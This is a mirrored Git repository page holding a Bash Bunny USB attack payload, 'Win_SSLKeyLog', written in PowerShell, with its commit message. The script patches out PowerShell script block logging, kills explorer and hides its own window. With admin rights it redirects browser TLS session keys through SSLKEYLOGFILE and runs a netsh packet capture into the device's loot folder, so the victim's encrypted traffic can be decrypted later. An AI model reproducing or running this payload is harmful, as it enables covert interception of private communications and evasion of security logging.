mirror of
https://github.com/hak5/bashbunny-payloads.git
synced 2025-10-29 16:58:25 +00:00
95e1d22dee
* Add Win_SSLKeyLog Captures the client network session. Captures the client side session keys. 1) Partially avoids "PowerShell Script Block Logging". 2) Closing of all windows. 3) Hide "PowerShell" window. 4) Check if current process have "Administrator" privilege. 5) Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information. 6) Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)". 7) Writes the file system cache to disk (thanks to @dark_pyrro). 8) Safely eject (thanks to @Night (9o3)). * Correction of some information in "README.md"
58 lines
2.1 KiB
PowerShell
58 lines
2.1 KiB
PowerShell
#
|
|
# Author: TW-D
|
|
# Version: 1.0
|
|
#
|
|
|
|
Param (
|
|
[String] $BB_VOLUME,
|
|
[Int] $SNIFFING_TIME
|
|
)
|
|
|
|
# Partially avoids "PowerShell Script Block Logging".
|
|
#
|
|
$etw_provider = [Ref].Assembly.GetType("System.Management.Automation.Tracing.PSEtwLogProvider").GetField("etwProvider", "NonPublic,Static")
|
|
$event_provider = New-Object System.Diagnostics.Eventing.EventProvider -ArgumentList @([Guid]::NewGuid())
|
|
$etw_provider.SetValue($null, $event_provider)
|
|
|
|
# Closing of all windows.
|
|
#
|
|
Get-Process -Name "explorer" | Stop-Process
|
|
|
|
# Hide "PowerShell" window.
|
|
#
|
|
$Script:showWindowAsync = Add-Type -MemberDefinition @"
|
|
[DllImport("user32.dll")]
|
|
public static extern bool ShowWindowAsync(IntPtr hWnd, int nCmdShow);
|
|
"@ -Name "Win32ShowWindowAsync" -Namespace Win32Functions -PassThru
|
|
$showWindowAsync::ShowWindowAsync((Get-Process -Id $pid).MainWindowHandle, 0) | Out-Null
|
|
|
|
# Check if current process have "Administrator" privilege.
|
|
#
|
|
If ( ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator") ) {
|
|
|
|
$bb_loot = "${BB_VOLUME}loot\"
|
|
|
|
# Sets the "SSLKEYLOGFILE" environment variable to store SSL session key information.
|
|
#
|
|
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
|
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", "${bb_loot}SSLKEYLOGFILE.txt", "User")
|
|
|
|
# Starts a "Network Tracing Session" with "ETW (Event Tracing for Windows)".
|
|
#
|
|
(NETSH trace start capture=yes report=no persistent=yes traceFile="${bb_loot}capture.etl" maxSize=0 fileMode=append) | Out-Null
|
|
Start-Sleep -Seconds $SNIFFING_TIME
|
|
(NETSH trace stop) | Out-Null
|
|
|
|
[Environment]::SetEnvironmentVariable("SSLKEYLOGFILE", $null, "User")
|
|
|
|
}
|
|
|
|
"Win_SSLKeyLog terminated." | Out-File -FilePath .\..\..\loot\done.txt -Force
|
|
|
|
# Writes the file system cache to disk (thanks to @dark_pyrro).
|
|
#
|
|
Write-VolumeCache -DriveLetter ("${BB_VOLUME}".Substring(0,1))
|
|
|
|
# Safely eject (thanks to @Night (9o3)).
|
|
#
|
|
(New-Object -ComObject Shell.Application).Namespace(17).ParseName("${BB_VOLUME}").InvokeVerb("Eject") |